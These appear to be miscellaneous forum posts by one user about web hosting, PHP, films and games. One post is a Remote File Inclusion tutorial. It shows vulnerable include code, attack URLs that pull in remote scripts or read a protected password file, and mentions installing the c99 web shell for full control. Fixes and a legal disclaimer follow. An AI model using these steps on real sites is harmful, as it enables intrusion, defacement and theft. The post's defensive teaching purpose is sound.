shadowx

Let just confirm what i think you want:You want a website to display information, and in the future you would like to have a database on this website?If so Trap 17 is fine for that sort of thing. Databases are installed automatically. You will need to learn a language like PHP in order to use the databases but no installation is required. If you want a different host with database support just look for a host that lists PHP and MYSQL. With Trap 17 you get two tools to use databases. One to set up a new database and another, PhpMyAdmin to insert/remove data from the databases. You will need to learn PHP or similar so you can program code to insert, select, remove, edit data in the database, like when a user signs up or logs in you use php to check the database etc...

The link from evolke is the one to follow if you are just singing up and are already hosted (like you are) for new members who have just been approved read this post. (im putting that as im sure some newbies will read this topic. For the time being your hosting is (as far as im aware) still working on credits. Opaque will give us the heads up when its time to switch over at which point we will all have to "buy" the hosting with MyCent but we will be told when to do that. So for now all you have to do is signup at the billing page with the SAME email address that you currently have listed in your profile. In 4-5 hours the script will refresh everything and update it all and your accounts will be linked. Under your avatar, above MyCent you will "earned so far" and a number in green. This is your xisto balance and can be checked at any time by logging in at the xisto page. Thats all you have to do for now until we are told otherwise

Interesting... the graph seems to promise good things but can we really expect these results in real life? I mean sure nice neat, light effective JS code might be very easy to parse on the new engine and hence increase speeds but not much JS code is that clean and nice so there could be some bugs there... Js as a language is platform independent as its run by the browser methinks...however virtually every browser uses a different JS engine and so you never quite know the outcome exactly as even a tiny difference can stop an effect working or something. And i also agree that FF3 is heavy, not as heavy as IE but damn mozilla is putting on a few pounds! Hopefully their next release is lighter and faster still.

What you need is to tell the server to parse HTML pages as PHP pages. Add this code: AddType application/x-httpd-php .html (remember to change .html to .htm is thats the extension you use.) to a file named .htaccess (no filename, simply the extension .htaccess ) If on windows name the file something.htaccess and then rename it manually to remove the part before the dot as windows is a fussy character... Then just upload the file to your root directory on your server and that should help. (thats also how they create dynamic images like site.com/image.png?name=shadowx but they use .png instead of .html)

I would say you should go to a dentist, it could be an infection or gum disease which needs to be identified by the dentist. It wont be painful, he will probably just take a look and maybe a swab to send off for testing. Is it possible to scrape of the black stuff? Or is it like a stain on your teeth that you cant remove?

just use the same email address as your forum email and in a few hours they will be linked and then its all done :)You must use the same email there as your email you used to register here

Damn you SM! i was going to wait a few days so i didnt spoil it! I saw it last night too i got home about 15 minutes after you said you were leaving in the shoutbox I am a HUGE saw fan and i think jigsaw is one of the best characters there are. This film highlights a few things. Jigsaw NEVER killed anyone, they killed themselves or chose death as preferable to pain, it also highlights (extremely well in the last scene) that you should always abide by the rules of the game! And you should always trust Jigsaw This was what let the film down. Saw 3/4 were the pinnacle of the series, saw 5 was on level with saw 2, especially given it was a big game with a similar format to saw 2, complete one task, move on etc.... The thing that let it down was that the traps, with the exception of the last trap, werent very jigsaw like... they didnt really involve high levels of pain, sacrifice etc... instead they focussed on the mind of the players, not the body. Ill try not to spoil it.....but the following HIDE section IS a spoiler! Hidden For example the trap with the sewers as safe chambers and the jars with keys hanging above. This game has nothing to do with the body of the "contestants" instead it is about how they think. In the first room the tape instructed them NOT to follow their instincts, their instincts of course being "every man for himself" however it become extremely apparent in the last game how wrong they were to kill their friends, if all had reached that room it would have been a lot quicker to fill the jar and all would have survived. As it is we do not yet know what happens to the two fools. It really does focus on how the detectives involved got involved what they feel about jigsaw etc.... which is important but slightly dull. Overall i give the film 4/5 all the other films get 5/5 I cant wait for saw 6 now!!

unlink("users/nabb");Muahahaha Consider the nabb group deleted!We are unstoppable, untraceable and most of all we all have a delete button

Yeh the text is a bit unclear, but i dont know how to solve that... i was going to overlay the text in a darker colour over the top of the distorted bump map but i couldnt remember what font i used :)the text says "SHADOWX @ T17" Its meant to be distorted but i think its a bit too far... no doubt ill fiddle with it tomorrow anyway (its 1:24am now! )

Ok girls and boys! Ive just been to see saw five and before i went, because im such a fan (Its GENIUS! and John is the GOOD guy! he never killed anyone, they killed themselves!) i made the sig thats in my forum sig right now! Perma link to my sig image: It started off with this one: (notice there are no scanlines in the border?) I then added the scanlines as in he first image And then in this last image i added some surgical tools (they are in the other two as well but hidden behind other layers, so i brought them forward...) Now im no graphic artist! in fact this is my best graphical work and i really like it! I really like the images i used, i had to increase the contrast on hte background layer(s) so that the contrast between the central panel and the background is better. And i like that! I also LOVE the text which is home grown using a tut on how to make golden text and then a shift effect (in gimp) to give the distorted effect as in the Saw 5 trailers (slightly anyway) the only thing is, it needs MORE! to fill that huge space in the panel above-right of the "shadowx @ t17" text. What i really want is "I want to play a game... Do you trust me?" Im not sure of the font etc... to use though! If anyone has any suggestions feel free to just copy my sig image and work on that or give me a few hints about what to do next Also can anyone tell me how to use the show.hide tags? I want to hide the coding group names to make my sig less bulky but ive never got on with the show/hide stuff! Any criticism welcome

Ah okies, im in communications with Xisto - Support now anyway and they are talking with Opaque to get it all resolved and hopefully preventing it happening again in the future to other people Ive got nearly $5 now I can show off!

In my continuing attempts to learn more about website security i am going to tell you about a classic attack called Remote File inclusion (RFI). RFI is exactly what it says really, it involves using (or including) code from one website on another website. So if i have a website : secure.com with a modular, dynamic system like: secure.com/index.php?module=home notice the GET variable on the end of the URL. If i enter "blah" instead of "home" i get either a blank page, or a 404: page not found error, there is also a chance you will get an error message like: Error: include(blah) file not found to includer on line 44 or similar error messages. So what does this mean? Well you can see that the file index.php takes the value of "module" adds a file extentsion to it, and then tries to use include(); on that file name. We can assume the code looks like this: $page = $_GET['module'] $extension = ".php";$file = "$page$extension"; //so we get page.phpinclude($file); We can check what extension is being used by finding one of the files. For example secure.com/index.php?module=login if we now explore the site looking for login.htm login.php etc.... we should eventually find the page login.php (all other extensions will result in a 404 error) So now we know the following: The site takes the GET variable, adds ".php" then uses include() to get the contents of that file into the page index.php Bad times! That means any file that we put after module= will be included and all the PHP code will be dumped into index.php So how do we make an RFI attack? Firstly you will need a website and a little PHP knowledge. You could make a test script like: <?echo "testing....";?> save it to your server as test.php and include it in the secure site like this: secure.com/index.php?module=http://forums.xisto.com/no_longer_exists/Now this is where we sort the men from the boys as it were.... There are two settings in PHP that control the opening of remote files on different servers. One works for FOPEN, Fwrite etc... and one works for include() and require() the line i am talking about is: allow_url_include (i think its written like that) If this is set to False our secure.com website is fairly secure and our RFI wont work because PHP isnt allowed to load files from other servers. We could then use another exploit for example if we knew the passwords were stored in as protected directory like protected/passwords.txt and we didnt have access to this directory because it asked us to login (using htaccess) we could use the index.php to bypass this with: secure.com/index.php?module=protected/passwords.txt If the secure site has code that automatically adds .php or another extension on to the GET variable (like in my example where we have $page$extension (something.php) ) you will need to add a ? after the passwords.txt -> passwords.txt? otherwise the automatic addition of .php will turn your file into passwords.txt.php which doesnt exist! and we would be shown all the passwords however not so many sites use this method! Some do though! Anyway..... If the secure.com server has the allow_url_include set to true our attack should work and we should see testing..... from our echo statement. Good times! Now we know that works we can do ANYTHING! if ou want to be able to upload files simply right a self contained upload script in PHP and include it like:secure.com/index.php?module=http://forums.xisto.com/no_longer_exists/ then on secure.com you will be shown an upload box where you can upload any PHP, HTML, EXE, etc... files you want. Doing this you can build yourself a nice control panel using PHP where you can delete, edit and upload files to their server. You now have complete control! Another option is to use a ready made control panel type system. The one i was introduced to is called c99.txt (DO NOT INCLUDE THIS FILE ON ANY SERVER) a "safe" version would simply give you a nice interface on the secure.com site where you cna edit any files you wish etc.... similar to file manager on cpanel with a few extra features. Essentially you would have complete control just by writing: secure.com/index.php?module=http://forums.xisto.com/no_longer_exists/? (remember the question mark!) Its file extension is confusing, it is actually a php file saved as .txt (im not sure why its saved as .txt but it is!) and the PHP inside builds you a control panel, effectively it installs a control panel on the target site. There are other systems you can use but c99.txt is the only one i know. So you can see, from a simple RFI exploit any attacker can gain complete control of your site with the same level of access as you have, scary! How do you stop this happening? Well if you have the ability to edit the php.ini file you can set allow_url_fopen to FALSE and allow_url_include to FALSE. Also, the method i prefer use something like: <?php$page = $_GET['module'];switch($page){case "blog":include("blog.php");break;case "contact":include("contact.php");break;case "gallery":include("gallery.php");break;default: //A page wasn't chosen, or one that wasn't "home" or "gallery"include("home.php");break;}?> So if i enter http://forums.xisto.com/no_longer_exists/ the PHP looks in the SWITCH statement for: case"http://forums.xisto.com/no_longer_exists/; doesnt find it so uses the DEFAULT value and shows me home.php Not much i can do now another option is to clean all user input (you should do that anyway!) to remove http:// ../ (go up one directory) all slashes / \ (to prevent things like folder/file.php) $page = $_GET['module'];$page = str_replace("http://", "", $page);$page = str_replace("/", "", $page);$page = str_replace("\\", "", $page);$page = str_replace("../", "", $page);$page = str_replace("..", "", $page); And so on... (note that code WONT protect you against all RFI attacks. In order to protect yourself you must first learn how to harm yourself, which is what i am doing ) you can also use an IF statement with instr("http://forums.xisto.com/;, $page) etc... and if it returns TRUE then it was an attack so log it and reject them Thats the basics anyway, there are many different ways to execute an RFI attack and every single successful attack is deadly! it could be to upload a new index.php file and overwrite your current one to "deface" your website (eg by having an index page that just says "Joo were H$X0R�D by |\/|�" ) or by uploading a deadly virus that would make your host very, very upset.... If you want to learn more just google "prevent RFI" i have focussed on PHP because its the only server side language i know well! but RFI attacks will work on ANY language that uses a function similar to php: include() or require(). Disclaimer: NEVER attempt these attacks on ANY server unless you have EXPLICIT and WRITTEN permission to do so. If you do not have written permission you can be taking to court, SUED or even put in prison! (for offences such as unauthorized access to computer systems, willing, unauthorized destruction of data etc..... If you wish to find a safe environment to learn more create your own server or find a server where you have written permission to learn and test yourself (PM me and i will give the URLs to some sites where you are encouraged to learn in a safe, secure and legal environment). the code i have written may or may not work. I make no assurances that by using my code you will be protected. My code has some severe holes in it!! Do not use my code thinking you are safe because that would be foolish. In order to protect yourself fully you must first learn yourself how to accomplish an attack and how to defend an attack. I may write another tutorial on XSS soon too....

I too dislike the homepage mainly because of the squashed up feel, however consider resizing your browser to 800X600 that page fits PERFECTLY in that size! and that, presumably, was the intention! If your users turn up with 600px wide screen and your page is 700px wide you've lost that visitor right there! What i think could be done is a more dynamic page. So on the left you could have "features" "news" etc... all as links, when clicked the central area changes to fit that description, this could be done with Javascript to prevent the page reloading or frames (or even a php dynamic system )Im not a designer so my input is limited, but from a coders point of view i can see so many dynamic things that could be done with that page to give the user only the info they want (plus a little extra but not much) but still keeping access to the huge amount of info there! but at the end of the day Xisto is changing a lot, so perhaps theres something planned! If not then it wouldnt take much to de-clutter the page, perhaps remove the boxes within the centre info panel and add more dynamic, and clear links Its still not terrible though!

As has been said its really impossible to do such things. A classic way is to prevent right clicking, but in most cases disabling javascript will thwart most scripts as most rely on JS. also clicking left and right button together fools the system. In general the script looks for the numbers corresponding to a mouse click, something like "1" is left, "2" is right, so if the mouseclick == 2 it was a right click so block it. but if i click both buttons and generate a 3 then the script is useless also View>source There are i think programs that claim to hide your HTML by somehow encrypting it but telling the browser how to display it or something. I dont know if they actually exist/work but im sure ive seen them advertised for high prices.But as Pyost said, for a browser to render a page it needs unrestricted access to the HTML code. and to display the code to the browser is to display it to the user!Of course you could always make your websute using flash or something and then the source is hidden, though thre are ways to get fragments back

yeh i dont think ive had any updates yet so ill give it a while and see what happens. Like i said im not bothered about it not updating yet, i just want to identify if the cause is a problem or just a laggy script. If its a problem ive caused then of course i want to resolve it so it isnt a long term thing. If its just a laggy script then im happy to wait for it to wake up. Ill leave it till monday, about 3 days, and if no updates are forthcoming ill submit a ticket or something.I noticed opaque had like a thousand MyCent's the other day! Rich man! Think im going to start talking to him more often

COD4 is an EXCELLENT game!The missions are very realistic and include things such as: sneaking into enemy bases with a sniper rifle and silenced pistol, gaining access to the top of a tower block and assassinating an enemy. If you miss you then pursue the enemy shooting guys as you go. Escaping from an enemy base in the back of a ruck being shot at and shooting back. And even taking control of the guns on a plane shooting at enemies with a huge machine gun or shells. The only thing i would say is the game is quite graphic and in more than once scene you are a dying character, slowly dying on the floor, and at one point seeing a close up of an enemy shooting himself in the head. If your son is young (id say below 13/15 years old) you might want to think more before buying this game. It is VERY realistic though and the online play is EXCELLENT! including fishing multiple real enemies in death matches etc... he would love it! (i know i do!)Something to consider is that here in the UK COD5 comes out in just a few weeks, im not sure what country you live in but see if you can find out when that game comes out. apparently you get to drive tanks etc....

Yeh i got it linked to start with, and then i changed my email on the forums, then i remember and changed it on the billing page too.I just want to make sure i am still linked, im not worried about it not updating yet it just seems everyone else is being updated and mine hasnt

Hello everyone, can anyone confirm for me the time it takes for Mycent to be updated? Is it 4-5 hours? If so i think one of two things has happened A.) The system has a little bug or B.) my accounts are no longer linked for some reason I did change my email on the forums and then on the billing page so that could be the cause of the issue. MyCent hasnt been updated for me for about 3 days now (i have just over 300 cents at the time of posting) Can anyone confirm what the issue could be? Or advise me what to do next? (i followed Opaques instructions to set both emails to the same, new email address and submitted a support ticket to confirm i have changed both my emails and notify the admins of this (no reply on that yet).

the problem is you have a URL as the link HREF value eg: <a href=#> and then some JS code to handle the onclick event. Change the links to: <a href="" onclick="MM_openBrWindow('17.10.08_show_me_more.html','','scrollbars=yes,resizable=yes,width=700,height=700')">SHOW ME MORE</a> and that should work hopefully (remove the hash # from the HREF section)

have you installed the modem?If its a USB device it will need to be installed by using the disk you got with the device (or google the make and model of the device with the word "drivers" and you will find a driver download) Once installed it should show up.If it is an RJ45 or an ethernet modem/device check that the network card on the old laptop actually works. Try connecting it to the new laptop (using a crossover cable) and check for connectivity. (or if you have some other network device like a hub or something try that.) the goal is to make sure the network card works. If it DOES work then the problem lies either with the modem or the cable used to connect it (probably) if the card DOESNT work (IE no network connection to ANY device) then the problem is obviously the network card.

Glad to see you've solved the issue, i have a little info that might help understand why you get the error message and why it doesnt always matter!Basically as said PMA (PhpMyAdmin) notices that you have a root account with FULL privileges and NO password. meaning if your server was online any attacker could very easily delete your databases, edit them etc.... because there is no password and the account has full privileges. For testing on a local server i wouldnt worry too much, just make sure you use a good firewall (you should anyway really!) to stop people gaining access to your DBs or your system. if you want to use another account on PMA just go to privileges (on the main page) and "add new user" from there just type in the new username and password. You can also then select the privileges of that user. For example you might have a PHP script where you want to ONLY select data from a DB (perhaps for a login or something) so you can have a restricted user that only has SELECT privileges, so even if an attacker used SQL injections they would never be able to delete or edit your databases because that user cannot do anything except read the databases. I dont know if that made sense or not but i hope it did! It also helps to create users that are the same as the ones on your real host so that when error-checking or editing scripts you dont have to worry about changing the username/password in the script

Hum i see... Well i know you can use SQL queries in VB, and you can also connect to remote servers (and presumably databases) with a winsock command/element (i think, its been a long time since i used VB and i didnt get along with it) So if you connect to the server using winsock (or the equivalent to open a connection to a remote server) and then use that connection as a link to the database (in the database connection code use the winsock link as the address) and use the SQL port (3306 on my local test server config thingy) you could in theory connect to the DB, then you can just do what you need to do by querying the database looking for the current user, if they dont exist then make a new record for them (this could be pretty complex as you may have to add details to more than one database and you may also need to encrypt data to make it work) and that would sign them up to the forum.the problem with this is that most hosts (i would expect) would not allow remote connections to the database for security reasons so you might have trouble with that. Another option could be to load a small PHP file within a hidden browser like: check.php?username=SOME_USERand in that PHP file do things like check in the DB for the username, if it doesnt exist then create it for them.Less complex that way i think (unless you dont know php) and less issues to overcome as you wont have to get through security gates to access the database and it would be easier to pass variables too. It would still require input like password, email address, real name etc... etc.... but you could use GET variables like: check.php?username=bob&password=bobpass&email=bob@bob.com etc.... etc..... #Make much sense? Probably not as its 00:31PM and i got up at 9am : /

I expect willielwgg's reply says it all, though to be honest xisto could make a killing by letting you deposit to paypal and taking a 30% or 50% cut.... so if i transferred $10 i would get $5 as i expect xisto gets cash from the mere fact of me posting on this forum (they have to make money somehow).... Tis a shame!

This is an interesting idea... i have around 300 credits so can spend 260 and have enough left to keep me going.... Admins: Can you confirm/deny that if i use credits to get a free domain it will/wont be kept active when credits dissappear? (and am i able to register a new domain name when it expires in a year or am i tied to that domain name forever?

Im not so good with HTTP headers myself as it goes! It was really just a sort of suggestion of steps to take. This link http://www.livejournal.com/doc/fotobilder-api will show some examples of HTTP headers with and without variables. Well PHP uses two main types of variables, POST and GET. GET variables are sent in the URL like you said up there ^^^ POST variables are sent via HTTP requests. If you can somehow set up the signup.php page to accept GET variables instead (that could be a fair amount of work!) then you could use a URL like you posted. Otherwise you might not be able to do this. It IS possible to use PHP to set HTTP headers and set POST variables within these headers using a library called cURL (or CURL) (google it) i never had much luck with it though, i found it quite complex and not all webhosts have it enabled for security reasons methinks. The last remaining option is to pay someone to modify all the forums you are planning to use to connect to one database (or create a PHP page to sign the user up on all the forums for you.) but that could cost a hundred pounds or more. What exactly is the situation? your clan uses a program for communication etc...? (did you write this app?) and you also have a forum? (just the one or more than one?) and you want it so any user who registers on the communication program is automatically registered on the forum(s)? If so there might be a solution involve javascript.... Im not 100% though it might not work (plus im not a JS expert so i can only lay the foundations)